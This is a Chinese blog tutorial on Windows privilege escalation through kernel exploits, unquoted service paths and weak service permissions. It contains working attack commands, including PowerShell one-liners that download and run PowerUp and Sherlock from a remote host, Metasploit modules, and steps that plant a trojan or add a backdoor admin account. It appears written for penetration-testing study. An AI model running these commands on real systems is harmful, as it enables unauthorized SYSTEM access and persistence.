Windows提权方法

最新推荐文章于 2024-05-10 02:22:47 发布
最新推荐文章于 2024-05-10 02:22:47 发布
阅读量6k 收藏 92
点赞数 8
分类专栏: 内网渗透
原文链接:https://blog.csdn.net/qq_45521281/article/details/113920096?spm=1001.2014.3001.5501
版权

目录

前言

在Windows中,有User、Administrator、System、TrustedInstaller这四种用户权限,其权限从左到右依次升高。而我们在一般的实战中,获得的权限较低,低权限将使渗透测试受到很多的限制。这就要求我们将当前权限提升到足以满足我们要求的高权限。
权限提升的方式大概有以下两类:

  • 纵向提权:低权限用户获得高权限角色的权限。
  • 横向提权:获得同级别角色的权限。

常用的提权方法有Windows系统内核溢出漏洞提权、错误的系统配置提权、数据库提权等等。

Windows系统内核溢出漏洞提权

溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名:缓冲区溢出漏洞。因为它是在程序执行的时候在缓冲区执行的错误代码,所以叫缓冲区溢出漏洞。缓冲溢出是最常见的内存错误之一,也是攻击者入侵系统时所用到的最强大、最经典的一类漏洞利用方式。成功地利用缓冲区溢出漏洞可以修改内存中变量的值,甚至可以劫持进程,执行恶意代码,最终获得主机的控制权。

利用Windows系统内核溢出漏洞提权是一种很通用的提权方法,攻击者通常可以使用该方法绕过系统中的所有安全限制。攻击者利用该漏洞的关键是目标系统有没有及时安装补丁,如果目标系统没有安装某一漏洞的补丁且存在该漏洞的话,攻击者就会向目标系统上传本地溢出程序,溢出Administrator权限。

1. 手动查找系统潜在漏洞

获取目标主机的一个普通用户的shell后,执行如下命令,查看目标系统上安装了那些补丁:

systeminfo
或
wmic qfe get caption,description,hotfixid,installedon

在这里插入图片描述

在这里插入图片描述

可以看到系统就装了这几个补丁。攻击者会通过没有列出的补丁号,寻找相应的提权EXP,例如KiTrap0D和KB979682对应、MS10-021和KB979683对应等等。

然后使用目标机上没有的安装的补丁号对应的EXP进行提权。Windows不同系统提权的漏洞和相应的补丁请见:
https://github.com/SecWiki/windows-kernel-exploits#%E6%BC%8F%E6%B4%9E%E5%88%97%E8%A1%A8

2. 自动查找系统潜在漏洞

Windows Exploit Suggester

下载地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester

该工具可以将系统中已经安装的补丁程序与微软的漏洞数据库进行比较,并可以识别可能导致权限提升的漏洞,而且其只需要我们给出目标系统的信息即可。

使用如下:

首先更新漏洞数据库,会生成一个xls的文件,如下 2020-08-20-mssb.xls

python2 windows-exploit-suggester.py --update

在这里插入图片描述
然后执行如下命令,查看目标主机系统信息,保存为sysinfo.txt文件:

systeminfo > sysinfo.txt

最后,运行如下命令,查看该系统是否存在可利用的提权漏洞:

python2 windows-exploit-suggester.py -d 2020-08-20-mssb.xls -i sysinfo.txt

在这里插入图片描述
如图给出存在可利用的漏洞!!

local_exploit_suggester 模块

Metasploit内置模块提供了各种可用于提权的local exploits,并会基于架构,平台(即运行的操作系统),会话类型和所需默认选项提供建议。这极大的节省了我们的时间,省去了我们手动搜索local exploits的麻烦。

使用如下,假设我们已经获得了目标主机的一个session:

use post/multi/recon/local_exploit_suggester 
set session 1
exploit

在这里插入图片描述
如上图,该模块快速识别并列出了系统中可能被利用的漏洞,十分方便。但虽然如此,也并非所有列出的local exploits都可用。

enum_patches 模块

会用metasploit中的post/windows/gather/enum_patches模块可以根据漏洞编号快速找出系统中缺少的补丁。使用如下:

use post/windows/gather/enum_patches
set session 1
exploit

在实际的查找潜在漏洞的过程中,建议手动和自动双管齐下。

下载地址:https://github.com/rasta-mouse/Sherlock

该脚本可以快速的查找出可能用于本地权限提升的漏洞。使用如下:

powershell -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/Sherlock.ps1');      // 远程执行
Import-Module 目录\Sherlock.ps1       本地执行

Find-AllVulns    // 调用脚本后,执行搜索命令

在这里插入图片描述

3. 选择漏洞并利用

查找了目标机器上的补丁并确定存在漏洞后,我们就可以像目标机器上传本地溢出程序,并执行。这里,我们选择的是CVE-2018-8120。

漏洞利用程序可以从以下几个地址中下载:(里面附有使用说明)

在这里插入图片描述
执行:

在这里插入图片描述
执行提权程序之前,为普通用户whoami权限,执行后为system权限。

完整操作:

在这里插入图片描述

Windows系统错误配置漏洞提权

在Windows系统中,攻击者通常会通过系统内核溢出漏洞来提权,但是如果碰到无法通过系统内核溢出漏洞提权的情况时,会可以利用系统中的错误配置漏洞来提权。下面演示几种常见的Windows系统错误配置漏洞提权方法。

Trusted Service Paths漏洞(可信任服务路径漏洞)

Trusted Service Paths 漏洞是由系统中的“CreateProcess”函数引起的,并利用了windows文件路径解析的特性。

首先,我们来认识一下Windows中文件路径解析的特性。例如,我们有一个文件路径为“C:\Program Files\Some Folder\Service.exe”。那么,对于该路径中的每一个空格,Windows都会尝试寻找并执行与空格前面的名字相匹配的程序。如上面的目录为例,Windows会依次尝试确定和执行一下程序:

 1. C:\Program.exe
 2. C:\Program Files\Some.exe
 3. C:\Program Files\Some Folder\Service.exe

可见,最后才确定并执行真正的程序Service.exe。而由于Windows服务通常是以system权限运行的,所以系统在解析服务所对应的文件路径中的空格时,也会以system系统权限进行,那么,如果我们将一个“适当命名”的可执行程序上传到以上所说的受影响的目录中,服务一旦启动或重启,该程序就会以system权限运行了,可见该漏洞利用了服务路径的文件/文件夹的权限。

该漏洞是由于一个服务的可执行文件没有正确的处理所引用的完整路径名,即一个服务的可执行文件的完整路径中含有空格且没有被双引号引起来,那么该服务就存在这个漏洞。下面演示该漏洞利用方法。

首先,我们可以用以下命令列出目标主机中所有存在空格且没有被引号括起来服务路径:

wmic service get name,displayname,pathname,startmode|findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr/i /v """

在这里插入图片描述

如上图,可以看到“whoami”和“Bunny”这两个服务对应的二进制文件路径没有引号包含起来,并且路径中包含空格。是存在该漏洞的,但在上传可执行文件进去之前,我们需要确定我们对目标文件夹是否有写入的权限。

这里我们使用Windows中的icacls命令,依次来检查“C:\”、“C:\Program Files\Program Folder”等目录的权限发现只有“C:\Program Files\program folder”目录有Everyone(OI)(CI)(F):

参数说明:

“M”表示修改
“F”代表完全控制
“CI”代表从属容器将继承访问控制项
“OI”代表从属文件将继承访问控制项。
这就意味着对该目录有读,写,删除其下的文件,删除该目录下的子目录的权限。

在这里插入图片描述
确认目标机器中存在此漏洞后,把要上传的程序重命名并放置在存在此漏洞且可写的目录下,执行如下命令,尝试重启服务。

sc stop <service_name>
sc start <service_name>

既然要重启服务,那么我们就可以知道,该提权方法需要管理员权限,重启服务的方法适用于从管理员权限到system的权限提升过程。而实际情况下,我们直接对目标主机执行“shutdown -r -t 0”命令让他重启就行了。

我们生成一个msf马并重命名为Hello.exe上传到该“C:\Program Files\Program Folder”目录下,然后分别执行如下命令重启该WhoamiTest服务:

sc stop WhomaiTest
sc start WhomaiTest

在这里插入图片描述
可知提权前为管理员权限(liukaifeng01),提权成功后我们得到一个system权限的session。

这里要注意,新反弹得到的meterpreter会很快就中断了,这是因为当一个进程在Windows中启动后,必须与服务控制管理进行通信,如果没有通信,服务控制管理器会认为出现了错误,进而终止这个进程。所以,我们要在终止载荷进程之前将它迁移到其他进程中,使用msf的“set AutoRunScript migrate -f”命令即可实现自动迁移进程:

在这里插入图片描述
该提权方法在metasploit中对应的模块为:exploit/windows/local/unquoted_service_path,使用如下:

(在之前的metasploit中为exploit/windows/local/trusted_service_path,但在新版的metasploit中替换替换成了exploit/windows/local/unquoted_service_path

use exploit/windows/local/unquoted_service_path
set session 1set AutoRunScript migrate -fexploit

在这里插入图片描述
如上图,提权成功。

系统服务错误权限配置漏洞

Windows 系统服务文件在操作系统启动时加载和执行,并在后台调用可执行文件。因此,如果一个低权限的用户对此系统服务调用的可执行文件拥有写权限,就可以将该文件替换成任意可执行文件,并随着系统服务的启动获得系统权限。Windows 服务是以System权限运行的,因此,其文件、文件夹和注册表键值都是受强访问控制机制保护的。但是,在某些情况下,操作系统中仍然存在一些没有得到有效保护的服务。

该漏洞利用有以下两种情况:

  • 服务未运行:攻击者会使用任意服务直接替换原来的服务,然后重启服务。
  • 服务正在运行且无法终止:这种情况符合绝大多数漏洞利用的场景,攻击者通常会利用DLL劫持技术并尝试重启服务来提权。

利用PowerUp.ps1脚本

下载地址:https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

这里我们利用一个Powershell的脚本——PowerUp,该脚本的AllChecks模块会检测目标主机存的Windows服务漏洞,然后通过直接替换可执行文件本身来实现权限的提升。

AllChecks模块的通常应用对象如下:

  • 没有被引号引起来的服务的路径。
  • 服务的可执行文件的权限设置不当
  • Unattend.xml文件
  • 注册表键AlwaysInstallElevated
powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/PowerUp.ps1');Invoke-ALLChecks"

在这里插入图片描述
如上图,可以看到PowerUp列出了所有可能存在该漏洞的服务的信息,并在AbuseFunction部分直接给出了利用方式。我们可以看到,目标主机的WhoamiTest服务可能存在该漏洞,然后我们再用icacls命令来测试该服务的可执行文件目录的“C:\Program Files\Program Folder\Hello Whoami\whoami.exe”文件是否有写入权限:

icacls "C:\Program Files\Program Folder\Hello Whoami\whoami.exe"

在这里插入图片描述
如上图,可以看到我们对whoami.exe文件是有完全控制权的,那么我们就可以直接将whoami.exe替换成我们的msf马,当服务重启时,我们就会得到一个System权限的meterpreter。

这里,我们用“AbuseFunction”那里已经给出的具体操作方式,执行如下。

将原来的服务可执行文件备份,并用一个可添加管理员用户的恶意可执行文件代替它,默认添加的用户名为join,密码为Password123!:

powershell -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/PowerUp.ps1');Install-ServiceBinary -ServiceName 服务名

在这里插入图片描述
接下来停止并再启动该服务的时候,但由于我们当前是普通用户,我们没有权限重启服务,所以我们可以等目标系统重启,我们通过msf控制目标机执行“shutdown -r”命令来重启,重启后即可成功创建join用户:

在这里插入图片描述
添加指定的管理员用户:

Install-ServiceBinary -ServiceName 服务名 -UserName Bunny -Password Liufupeng123

在这里插入图片描述

Metasploit中的service_permissions模块

该漏洞提权在metasploit上面对应的模块为exploit/windows/local/service_permissions

在这里插入图片描述
如上图,该模块有两个可以设置的选项,其中如果把AGGRESSIVE选项设为“true”,则可以利用目标机器上每一个有该漏洞的服务,设为“false”则在第一次提权成功后就会停止工作。演示如下:

在这里插入图片描述
注:一定要迁移进程!!!!!

她总是阴雨天
关注
  • 8
    点赞
  • 92
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows常见的几种提权方法
hackzkaq的博客
05-20 1万+
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全—杰斯 提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限 在渗透测试过程中,拿到一个webshell之后,一般来说,我们的权限都是目标服务器中间件的权限。 这个时候就需要利用各种漏洞来提升自己的权限,从而能够获得对目标服务器的控制。 1.补丁查询法 简介 补丁一般都是为了应对计算机中存在的漏洞,为了更好的优化计算机的
windows程序提权方法
热门推荐
sowhat_Ah的专栏
02-04 2万+
Windows下应用程序如果需要做一些系统管理或进程管理之类的工作,经常需要将本进程提权(获取权限令牌); 而通常windows提权方法有两种,主要的方法是: 1)win32API——AdjustTokenPrivileges; 2)ntdll.dll——RtlAdjustPrivilege; 前者是已公开的win32系统API,后者是非公开的导出函数(藏在ntdll.dll里); 两
系统提权——Windows系统提权
JulySec的博客
02-13 2024
系统提权——Windows系统提权。 1、使用系统自带命令提权; 2、进程注入; 3、令牌窃取; 4、DLL劫持; 5、不安全的服务配置。 UAC机制的绕过
网络安全最新windows权限提升总结,2024年最新5分钟搞定
最新发布
2401_84545468的博客
05-10 749
服务的执行就是执行指定目录下的执行程序,但是有的服务的执行程序可以用修改,前期信息收集的时候,我们就可以使用工具来修改服务程序的路径,让服务启动的时候去执行我们的后门程序,我们在攻击机器上进行监听就可以获取到其计算机权限(修改服务对应的执行程序,将这个执行程序改为我们的后门程序就可以做到执行这个服务的时候来执行我们的后门程序从而实现上线)在实际的运用过程中,我们使用webshell工具目标主机上就可以调用这个程序,然后使用msf进行监听后门就可以获取权限(PS:不同的主机需要使用不同id号码进行提权
windows权限提升总结
m0_66458291的博客
03-31 1122
本文总结了常见的windows提权的几种方式如定时任务提权、sc提权、PSExec提权、进程迁移提权、烂土豆提权、passUAC、DLL劫持、不带引号的安全路径问题、修改服务程序的执行路径等等
windows 进程降权和提权代码示例
jangdong的专栏
05-27 1776
#include "windows.h" BOOL GetTokenByName(HANDLE &hToken,LPTSTR lpName) { if(!lpName) { return FALSE; } HANDLE hProcessSnap = NULL; BOOL bRet = FALSE; PROCESSENTRY32 pe32 = {0}; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, .
windows 提权
qq_63527808的博客
11-22 973
一、提权的常用方法
metasploit下Windows的多种提权方法
02-25
目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里已有介绍,这里不再...
windows&linux;提权总结
04-24
windows&linux;提权总结,套路,套路,套路,套路套路,套路,套路,。
windows账户提权 API.zip
01-22
总的来说,这个压缩包中的资源详细介绍了Windows环境下使用API进行账户提权的各种技术和策略,涵盖了从创建高权限进程到修改系统服务和注册表等多方面。这些技术在系统管理和软件开发中有其应用,但滥用可能会导致...
windows提权工具
01-15
可以对win2K3-win2012 server进行提权 win7也可以,win10没试过
【内网安全】——Windows提权姿势
Demo不是emo的博客
02-06 5264
超详细的windows提权姿势汇总
Windows最最最常见的几种提权方法
2301_80115097的博客
12-12 902
Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限。要利用此漏洞,攻击者首先必须登录到系统。
Kotlin 实现动态获权的两种方式?
yyxhzdm的博客
09-21 822
一、自定义 1.在项目的BaseActivity添加代码 /** * 动态获权 * */ /** * 动态获权请求值 */ private var REQUEST_CODE_PERMISSION = 0x00099 protected val TAG = this.javaClass.simpleName /** * 请求权限 * 动态获权 * @param permissions 请求的权限 * @param requestCode 请求权限的请求码 */ open fun re
内网渗透-----权限分析及防御
qq_43590351的博客
10-20 3045
内网权限提升及防御
windows系统权限提升
weixin_53639243的博客
04-23 1529
提权方法
Windows提权&amp;BypassUAC&amp;Dll劫持(1),稳进大厂
m0_55030688的博客
04-15 599
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。上传替代原来的dll文件,这里我把原来dll文件名改成了321,我们上传的替代原来的。
Windows操作系统——WindowsVulnScan提权辅助工具简介与使用教程
liver100day的博客
11-16 1万+
文章目录WindowsVulnScan提权辅助工具简介与使用教程1.工具简介2.工具使用教程1、运行powershell脚本KBCollect.ps1收集信息2.进入powershell3.输入脚本名称并运行4.KBCollect.ps1脚本运行结束后,会在当前目录生成一个KB.json文件,该文件详细描述当前操作系统的版本信息与已经打过的漏洞补丁信息5.运行python脚本cve-check.py -u 创建CVEKB数据库6.运行python脚本7.运行python脚本后言 WindowsVulnSca
win提权第二弹服务提权
m0_73255659的博客
03-19 734
其次我们可以知道windows 服务是 与 exe 可执行文件相关,同时 我们可以知道服务需要指定一个用户,因此我们能够想到什么 就是上次我们分享到 计划任务。SCM 是一个负责根据需要管理服务状态、检查任何给定服务的当前状态并通常提供配置服务的方法的进程。如果我们能够也获得相应 exe 文件的修改权限我们是否可以根据这个权限,执行一个payload获取到相应服务指定用户的权限。但是此时我们不仅是要看我们有这个权限我们还要看 我们要运行的服务的目标账户有没有权限。此时我们正常会想到什么?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值